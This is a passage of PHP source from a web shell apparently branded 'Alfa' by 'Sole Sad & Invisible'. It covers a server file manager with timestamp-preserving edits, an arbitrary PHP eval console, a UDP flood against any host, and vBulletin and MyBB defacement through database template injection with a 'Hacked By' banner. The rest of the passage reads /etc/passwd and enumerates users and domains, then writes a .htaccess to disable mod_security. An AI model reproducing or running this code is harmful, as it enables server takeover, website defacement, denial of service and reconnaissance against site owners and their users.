1062. if($dirContent === false) { echo '<h3><span>| Access Denied :( |</span></h3></div>';alfaFooter(); return; }
1063. global $sort;
1064. $sort = array('name', 1);
1065. if(!empty($_POST['alfa1'])) {
1066. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
1067. $sort = array($match[1], (int)$match[2]);
1068. }
1069. echo "
1070. <table width='100%' class='main' cellspacing='0' cellpadding='2' >
1071. <form name=files method=post><tr><th><font color=\"#FFFFFF\"><b>Name</font></b></th><th><font color=\"#FFFFFF\"><b>Size<font></b></th><th><font color=\"#FFFFFF\"><b>Modify</b></font></th><th><font color=\"#FFFFFF\"><b>Owner/Group</font></b></th><th><font color=\"#FFFFFF\"><b>Permissions</font></b></th><th><font color=\"#FFFFFF\"><b>Actions</b></font></th></tr>";
1072. $dirs = $files = array();
1073. $n = count($dirContent);
1074. for($i=0;$i<$n;$i++) {
1075. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1076. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1077. $tmp = array('name' => $dirContent[$i],
1078. 'path' => $GLOBALS['cwd'].$dirContent[$i],
1079. 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
1080. 'perms' => alfaPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
1081. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
1082. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
1083. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
1084. );
1085. if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
1086. $files[] = array_merge($tmp, array('type' => 'file'));
1087. elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
1088. $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
1089. elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
1090. $dirs[] = array_merge($tmp, array('type' => 'dir'));
1091. }
1092. $GLOBALS['sort'] = $sort;
1093. function wsoCmp($a, $b) {
1094. if($GLOBALS['sort'][0] != 'size')
1095. return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
1096. else
1097. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
1098. }
1099. usort($files, "wsoCmp");
1100. usort($dirs, "wsoCmp");
1101. $files = array_merge($dirs, $files);
1102. $l = 0;
1103. foreach($files as $f) {
1104. echo '<tr'.($l?' class=l1':'').'><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td><td>'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
1105. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'<a href="#" onclick="g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\')"> X </a></td></tr>';
1106. $l = $l?0:1;
1107. }
1108. echo "<tr><td colspan=7>
1109. <input type=hidden name=a value='FilesMan'>
1110. <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
1111. <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
1112. </form></table></div>";
1113. alfafooter();
1114. }
1115. function alfaFilesTools() {
1116. if( isset($_POST['alfa1']) )
1117. $_POST['alfa1'] = urldecode($_POST['alfa1']);
1118. if(@$_POST['alfa2']=='download') {
1119. if(@is_file($_POST['alfa1']) && @is_readable($_POST['alfa1'])) {
1120. ob_start("ob_gzhandler", 4096);
1121. header("Content-Disposition: attachment; filename=".basename($_POST['alfa1']));
1122. if (function_exists("mime_content_type")) {
1123. $type = @mime_content_type($_POST['alfa1']);
1124. header("Content-Type: " . $type);
1125. } else
1126. header("Content-Type: application/octet-stream");
1127. $fp = @fopen($_POST['alfa1'], "r");
1128. if($fp) {
1129. while(!@feof($fp))
1130. echo @fread($fp, 1024);
1131. fclose($fp);
1132. }
1133. }exit;
1134. }
1135. if( @$_POST['alfa2'] == 'mkfile' ) {
1136. if(!file_exists($_POST['alfa1'])) {
1137. $fp = @fopen($_POST['alfa1'], 'w');
1138. if($fp) {
1139. $_POST['alfa2'] = "edit";
1140. fclose($fp);
1141. }
1142. }
1143. }
1144. alfahead();
1145. echo '<div class=header>';
1146. if( !file_exists(@$_POST['alfa1']) ) {
1147. echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#ffffff\">FILE DOEST NOT EXITS(Deleted)<b></font> </pre></div>";
1148. alfaFooter();
1149. return;
1150. }
1151. $uid = @posix_getpwuid(@fileowner($_POST['alfa1']));
1152. if(!$uid) {
1153. $uid['name'] = @fileowner($_POST['alfa1']);
1154. $gid['name'] = @filegroup($_POST['alfa1']);
1155. } else $gid = @posix_getgrgid(@filegroup($_POST['alfa1']));
1156. echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['alfa1'])).' <span>Size:</span> '.(is_file($_POST['alfa1'])?alfaSize(filesize($_POST['alfa1'])):'-').' <span>Permission:</span> '.alfaPermsColor($_POST['alfa1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1157. echo '<br>';
1158. if( empty($_POST['alfa2']) )
1159. $_POST['alfa2'] = 'view';
1160. if( is_file($_POST['alfa1']) )
1161. $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
1162. else
1163. $m = array('Chmod', 'Rename', 'Touch');
1164. foreach($m as $v)
1165. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['alfa2'])?'<b><span> '.$v.' </span> </b>':$v).' </span></a> ';
1166. echo '<br><br>';
1167. switch($_POST['alfa2']) {
1168. case 'view':
1169. echo '<pre class=ml1>';
1170. $fp = @fopen($_POST['alfa1'], 'r');
1171. if($fp) {
1172. while( !@feof($fp) )
1173. echo htmlspecialchars(@fread($fp, 1024));
1174. @fclose($fp);
1175. }
1176. echo '</pre>';
1177. break;
1178. case 'highlight':
1179. if( @is_readable($_POST['alfa1']) ) {
1180. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
1181. $code = @highlight_file($_POST['alfa1'],true);
1182. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
1183. }
1184. break;
1185. case 'chmod':
1186. if( !empty($_POST['alfa3']) ) {
1187. $perms = 0;
1188. for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
1189. $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
1190. if(!@chmod($_POST['alfa1'], $perms))
1191. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';
1192. }
1193. clearstatcache();
1194. echo '<script>alfa3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['alfa1'])),-4).'"><input type=submit value=">>"></form>';
1195. break;
1196. case 'edit':
1197. if( !is_writable($_POST['alfa1'])) {
1198. echo 'File isn\'t writeable';
1199. break;
1200. }
1201. if( !empty($_POST['alfa3']) ) {
1202. $time = @filemtime($_POST['alfa1']);
1203. $_POST['alfa3'] = substr($_POST['alfa3'],1);
1204. $fp = @fopen($_POST['alfa1'],"w");
1205. if($fp) {
1206. @fwrite($fp,$_POST['alfa3']);
1207. @fclose($fp);
1208. echo 'Saved!<br><script>alfa3_="";</script>';
1209. @touch($_POST['alfa1'],$time,$time);
1210. }
1211. }
1212. echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
1213. $fp = @fopen($_POST['alfa1'], 'r');
1214. if($fp) {
1215. while( !@feof($fp) )
1216. echo htmlspecialchars(@fread($fp, 1024));
1217. @fclose($fp);
1218. }
1219. echo '</textarea><input type=submit value=">>"></form>';
1220. break;
1221. case 'hexdump':
1222. $c = @file_get_contents($_POST['alfa1']);
1223. $n = 0;
1224. $h = array('00000000<br>','','');
1225. $len = strlen($c);
1226. for ($i=0; $i<$len; ++$i) {
1227. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
1228. switch ( ord($c[$i]) ) {
1229. case 0: $h[2] .= ' '; break;
1230. case 9: $h[2] .= ' '; break;
1231. case 10: $h[2] .= ' '; break;
1232. case 13: $h[2] .= ' '; break;
1233. default: $h[2] .= $c[$i]; break;
1234. }
1235. $n++;
1236. if ($n == 32) {
1237. $n = 0;
1238. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1239. $h[1] .= '<br>';
1240. $h[2] .= "\n";
1241. }
1242. }
1243. echo '<table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1244. break;
1245. case 'rename':
1246. if( !empty($_POST['alfa3']) ) {
1247. if(!@rename($_POST['alfa1'], $_POST['alfa3']))
1248. echo 'Can\'t rename!<br>';
1249. else
1250. die('<script>g(null,null,"'.urlencode($_POST['alfa3']).'",null,"")</script>');
1251. }
1252. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['alfa1']).'"><input type=submit value=">>"></form>';
1253. break;
1254. case 'touch':
1255. if( !empty($_POST['alfa3']) ) {
1256. $time = strtotime($_POST['alfa3']);
1257. if($time) {
1258. if(!touch($_POST['alfa1'],$time,$time))
1259. echo 'Fail!';
1260. else
1261. echo 'Touched!';
1262. } else echo 'Bad time format!';
1263. }
1264. clearstatcache();
1265. echo '<script>alfa3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['alfa1'])).'"><input type=submit value=">>"></form>';
1266. break;
1267. }
1268. echo '</div>';
1269. alfaFooter();
1270. }
1271. function alfaphpeval()
1272. {
1273. alfahead();
1274. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')) {
1275. echo '<div class=header>';
1276. ob_start();
1277. $INI=ini_get_all();
1278. print '<table border=0><tr>'
1279. .'<td class="listing"><font class="highlight_txt">Param</td>'
1280. .'<td class="listing"><font class="highlight_txt">Global value</td>'
1281. .'<td class="listing"><font class="highlight_txt">Local Value</td>'
1282. .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
1283. foreach ($INI as $param => $values)
1284. print "\n".'<tr>'
1285. .'<td class="listing"><b>'.$param.'</td>'
1286. .'<td class="listing">'.$values['global_value'].' </td>'
1287. .'<td class="listing">'.$values['local_value'].' </td>'
1288. .'<td class="listing">'.$values['access'].' </td></tr>';
1289. $tmp = ob_get_clean();
1290. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
1291. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
1292. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
1293. }
1294. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
1295. echo '<div class=header><style>.p {color:#000;}</style>';
1296. ob_start();
1297. phpinfo();
1298. $tmp = ob_get_clean();
1299. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
1300. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
1301. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
1302. }
1303. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
1304. echo '<div class=header>';
1305. ob_start();
1306. $EXT=get_loaded_extensions ();
1307. print '<table border=0><tr><td class="listing">'
1308. .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT)
1309. .'</td></tr></table>'
1310. .count($EXT).' extensions loaded';
1311. echo '</div><br>';
1312. }
1313. if(empty($_POST['ajax']) && !empty($_POST['alfa1']))
1314. $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
1315. echo '<div class=header><Center><a href=# onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=# onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=# onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\'); return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type=submit value=Eval style="margin-top:5px"></center>';
1316. echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
1317. if(!empty($_POST['alfa1'])) {
1318. ob_start();
1319. eval($_POST['alfa1']);
1320. echo htmlspecialchars(ob_get_clean());
1321. }
1322. echo '</pre></div>';
1323. alfafooter();
1324. }
1325. function alfahash()
1326. {
1327. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
1328. if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
1329. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
1330. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
1331. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
1332. $stringTools = array(
1333. 'Base64 encode' => 'base64_encode',
1334. 'Base64 decode' => 'base64_decode',
1335. 'md5 hash' => 'md5',
1336. 'sha1 hash' => 'sha1',
1337. 'crypt' => 'crypt',
1338. 'CRC32' => 'crc32',
1339. 'Url encode' => 'urlencode',
1340. 'Url decode' => 'urldecode',
1341. 'Full urlencode' => 'full_urlencode',
1342. 'Htmlspecialchars' => 'htmlspecialchars',
1343. );
1344. alfahead();
1345. echo '<div class=header>';
1346. if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
1347. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1348. echo "<form onSubmit='g(null,null,this.selectTool.value,this.input.value); return false;'><select name='selectTool'>";
1349. foreach($stringTools as $k => $v)
1350. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1351. echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['alfa1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1352. if(!empty($_POST['alfa1'])) {
1353. if(in_array($_POST['alfa1'], $stringTools))echo htmlspecialchars($_POST['alfa1']($_POST['alfa2']));
1354. }
1355. echo "</div>";
1356. alfaFooter();
1357. }
1358. function alfados()
1359. {
1360. alfahead();
1361. echo '<div class=header>';
1362. if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
1363. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1364. echo '<center><span>| UDP |</span><br><br><form onSubmit="g(null,null,this.udphost.value,this.udptime.value,this.udpport.value); return false;" method=POST><span>Host : </span><input name="udphost" type="text" size="25" /><span> Time : </span><input name="udptime" type="text" size="15" /><span> Port : </span><input name="udpport" type="text" size="10" /><input type="submit" value=">>" /></form></center>';
1365. echo "<pre class='ml1' style='".(empty($_POST['alfa1'])?'display:none;':'')."margin-top:5px' >";
1366. if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3']))
1367. {
1368. $packets=0;
1369. ignore_user_abort(true);
1370. $exec_time=$_POST['alfa2'];
1371. $time=time();
1372. $max_time=$exec_time+$time;
1373. $host=$_POST['alfa1'];
1374. $portudp=$_POST['alfa3'];
1375. for($i=0;$i<65000;$i++)
1376. {
1377. $out .= 'X';
1378. }
1379. while(1){
1380. $packets++;
1381. if(time() > $max_time){
1382. break;
1383. }
1384. $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5);
1385. if($fp){
1386. fwrite($fp, $out);
1387. fclose($fp);
1388. }
1389. }
1390. echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second";
1391. echo "</pre>";
1392. }
1393. echo '</div>';
1394. alfafooter();
1395. }
1396. function alfaIndexChanger(){
1397. alfahead();
1398. echo '<div class=header><script>alfa1_=alfa2_=alfa3_=alfa4_="";</script><center><h3><span>| Index Changer |</span></h3><center><h3><a href=# onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=# onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
1399. if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')) {
1400. echo "<script>alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=\"\";</script><center><table border=0 width='100%'>
1401. <tr><td>
1402. <center><b><font color=\"#FFFF01\">==</font> <font color=\"#00A220\">vBulletin</font> <font color=\"#FFFFFF\">Index</font> <font color=\"#FF0000\">Changer</font><font color=\"#FFFF01\"> ==</font></b>
1403. <p> <center><form onSubmit=\"g('IndexChanger',null,'vb',null,null,null,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\" method=POST>
1404. <table border=1>
1405. <tr><td><font color='#FFFFFF'><b>Mysql Host</b></font></td>
1406. <td><input type=text name=dbh value=localhost size='50' ></td></tr>
1407. <tr><td><font color='#FFFFFF'><b>Db User</b><br></font></td>
1408. <td> <input type=text name=dbu size='50' ></td></tr>
1409. <tr><td><font color='#FFFFFF'><b>Db Name</b><br></font></td>
1410. <td> <input type=text name=dbn size='50' ></td></tr>
1411. <tr><td><font color='#FFFFFF'><b>Db Pass</b><br></font></td>
1412. <td> <input type=text name=dbp size='50' ></td></tr>
1413. </table>
1414. <font color='#FFFF01' size=\"3\"><b>your index</b></font><br>
1415. <textarea name=index rows='19' cols='103' style='color: #FFFFFF; background-color: #000000'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
1416. <input type=submit value='>>'>
1417. </form></center></td></tr>
1418. </table></center>";
1419. if(isset($_POST['alfa6'])) {
1420. $s0levisible="Powered By Solevisible";
1421. $dbu = $_POST['alfa6'];
1422. $dbn = $_POST['alfa7'];
1423. $dbp = $_POST['alfa8'];
1424. $dbh = $_POST['alfa9'];
1425. $index = $_POST['alfa10'];
1426. $index=str_replace("\'","'",$index);
1427. $set_index = "{\${eval(base64_decode(\'";
1428. $set_index .= base64_encode("echo \"$index\";");
1429. $set_index .= "\'))}}{\${exit()}}</textarea>";
1430. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
1431. {
1432. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
1433. mysql_select_db($dbn) or die(mysql_error());
1434. $loli1 = "UPDATE template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
1435. $loli2 = "UPDATE template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
1436. $loli3 = "UPDATE style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
1437. $result = mysql_query($loli1) or die (mysql_error());
1438. $result = mysql_query($loli2) or die (mysql_error());
1439. $result = mysql_query($loli3) or die (mysql_error());
1440. echo "<script>alert('VB index changed');</script>";
1441. }
1442. }
1443. }
1444. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
1445. echo "<script>alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=\"\";</script><center><table border=0 width='100%'>
1446. <tr><td>
1447. <center><b><font color=\"#FFFF01\">==</font> <font color=\"#00A220\">Mybb</font> <font color=\"#FFFFFF\">Index</font> <font color=\"#FF0000\">Changer</font><font color=\"#FFFF01\"> ==</font></b>
1448. <p><center><form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
1449. <table border=1>
1450. <tr><td><font color='#FFFFFF'><b>Mysql Host</b></font></td>
1451. <td><input type=text name=mybbdbh value=localhost size='50' ></td></tr>
1452. <tr><td><font color='#FFFFFF'><b>Db User</b><br></font></td>
1453. <td> <input type=text name=mybbdbu size='50' ></td></tr>
1454. <tr><td><font color='#FFFFFF'><b>Db Name</b><br></font></td>
1455. <td> <input type=text name=mybbdbn size='50' ></td></tr>
1456. <tr><td><font color='#FFFFFF'><b>Db Pass</b><br></font></td>
1457. <td> <input type=text name=mybbdbp size='50' ></td></tr>
1458. </table>
1459. <font color='#FFFF01' size=\"3\"><b>your index</b></font><br>
1460. <textarea name=mybbindex rows='19' cols='103' style='color: #FFFFFF; background-color: #000000'>
1461. <title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
1462. <input type=submit value='>>' >
1463. </form></center></td></tr></table></center>";
1464. if(isset($_POST['alfa6'])) {
1465. $mybb_dbh = $_POST['alfa6'];
1466. $mybb_dbu = $_POST['alfa7'];
1467. $mybb_dbn = $_POST['alfa8'];
1468. $mybb_dbp = $_POST['alfa9'];
1469. $mybb_index = $_POST['alfa10'];
1470. if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
1471. {
1472. mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
1473. mysql_select_db($mybb_dbn) or die(mysql_error());
1474. $prefix="mybb_";
1475. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
1476. $result = mysql_query($loli7) or die (mysql_error());
1477. echo "<script>alert('MyBB index changed');</script>";
1478. }
1479. }
1480. }
1481. echo "</div>";
1482. alfafooter();
1483. }
1484. function alfaproc()
1485. {
1486. alfahead();
1487. echo "<Div class=header><center>";
1488. if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
1489. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1490. if($GLOBALS['sys']=="win")
1491. {
1492. $process=array(
1493. "System Info" =>"systeminfo",
1494. "Active Connections" => "netstat -an",
1495. "Running Services" => "net start",
1496. "User Accounts" => "net user",
1497. "Show Computers" => "net view",
1498. "ARP Table" => "arp -a",
1499. "IP Configuration" => "ipconfig /all"
1500. );
1501. }
1502. else
1503. {
1504. $process=array(
1505. "Process status" => "ps aux",
1506. "Syslog" =>"cat /etc/syslog.conf",
1507. "Resolv" => "cat /etc/resolv.conf",
1508. "Hosts" =>"cat /etc/hosts",
1509. "Cpuinfo"=>"cat /proc/cpuinfo",
1510. "Version"=>"cat /proc/version",
1511. "Sbin"=>"ls -al /usr/sbin",
1512. "Interrupts"=>"cat /proc/interrupts",
1513. "lsattr"=>"lsattr -va",
1514. "Uptime"=>"uptime",
1515. "Fstab" =>"cat /etc/fstab",
1516. );}
1517. foreach($process as $n => $link)
1518. {
1519. echo '<a href="#" onclick="g(null,null,\''.$link.'\')"> | '.$n.' | </a>';
1520. }
1521. echo "</center>";
1522. if(!empty($_POST['alfa1']))
1523. {
1524. echo "<pre class='ml1' style='margin-top:5px' >";
1525. echo alfaEx($_POST['alfa1']);
1526. echo '</pre>';
1527. }
1528. echo "</div>";
1529. alfafooter();
1530. }
1531. function alfasafe()
1532. {
1533. alfahead();
1534. echo "<div class=header><script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=alfa8_=\"\"</script><center><h3><span>| Atuo ByPasser |</span></h3>";
1535. echo '<h3><a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(apache) | </a><a href=# onclick="g(null,null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=# onclick="g(null,null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=# onclick="g(null,null,null,null,null,null,\'users\')">| Read-Users | </a><a href=# onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=# onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
1536. if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains')
1537. {if(!@file_exists("/etc/virtual/domainowners")){
1538. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
1539. $solevisible9 = @file('/etc/named.conf');
1540. foreach($solevisible9 as $solevisible13){
1541. if(@eregi('zone',$solevisible13)){
1542. preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
1543. if(strlen(trim($solevisible14[1][0])) > 2){
1544. echo $solevisible14[1][0].'<br>';
1545. }}}
1546. }else{
1547. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>".
1548. $users = @file("/etc/virtual/domainowners");
1549. foreach($users as $boz){
1550. $dom = explode(":",$boz);
1551. echo $dom[0]."\n";
1552. }}}
1553. if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases')
1554. {
1555. echo '<center><script>alfa6_=alfa7_=alfa9_=\"\"</script>
1556. <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,this.go.value); return false;" method="post" action="" />
1557. <input type="text" placeholder="site.com" name="site" />
1558. <input type="submit" value=">>" name="go" />
1559. </form></center>
1560. ';
1561. if($_POST['alfa9'] && $_POST['alfa9'] == '>>')
1562. {
1563. if(!@file_exists("/etc/virtual/domainowners")){
1564. if(function_exists("posix_getpwuid") && function_exists("fileowner")){
1565. $site = trim($_POST['alfa7']);
1566. $rep = str_replace(array("https://","http://","www."),"",$site);
1567. if($user = posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
1568. if($user['name']!= 'root'){
1569. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\">
1570. <center>
1571. <table border=1>
1572. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user['name']}</font></b></td></tr>
1573. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr>
1574. </table>
1575. </center>";}}}
1576. else {echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br/><center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
1577. }else{
1578. $site = trim($_POST['alfa7']);
1579. $rep = str_replace(array("https://","http://","www."),"",$site);
1580. $users = @file("/etc/virtual/domainowners");
1581. foreach($users as $boz){
1582. $ex = explode(":",$boz);
1583. if($ex[0] == $rep){
1584. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\">
1585. <center>
1586. <table border=1>
1587. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
1588. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
1589. if(!empty($_POST['alfa5']) && isset($_POST['alfa5']))
1590. {
1591. if(!@file_exists("/etc/virtual/domainowners")){
1592. echo '<pre id="strOutput" style="margin-top:5px" class="ml1">';
1593. $i = 0;
1594. while ($i < 60000) {
1595. $line = posix_getpwuid($i);
1596. if (!empty($line)) {
1597. while (list ($key, $vl) = each($line)){
1598. echo $vl."\n";
1599. break;}}$i++;}
1600. }else{echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br>';
1601. $users = @file("/etc/virtual/domainowners");
1602. foreach($users as $boz){
1603. $user = explode(":",$boz);
1604. echo trim($user[1]).'<br>';}}}
1605. if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
1606. echo '<pre id="strOutput" style="margin-top:5px" class="ml1">';
1607. if(function_exists("system") || function_exists("exec") || function_exists("passthru") || function_exists("shell_exec")){echo alfaEx("cat /etc/passwd");}
1608. elseif(function_exists("file_get_contents") && is_readable("/etc/passwd")){
1609. echo file_get_contents("/etc/passwd");}
1610. elseif(function_exists("posix_getpwuid")){
1611. for($uid=0;$uid<60000;$uid++){
1612. $ara = @posix_getpwuid($uid);
1613. if (!empty($ara)) {
1614. while (list ($key, $val) = each($ara)){
1615. print "$val:";
1616. }print "\n";}}
1617. } else{echo '<script>alert("Error in bypass... im sorry:\(")</script>';}}
1618. if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
1619. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1620. fwrite($fil,'#Generated By Sole Sad and Invisible
1621. <IfModule mod_security.c>
1622. Sec------Engine Off
1623. Sec------ScanPOST Off
1624. </IfModule>');
1625. fclose($fil);
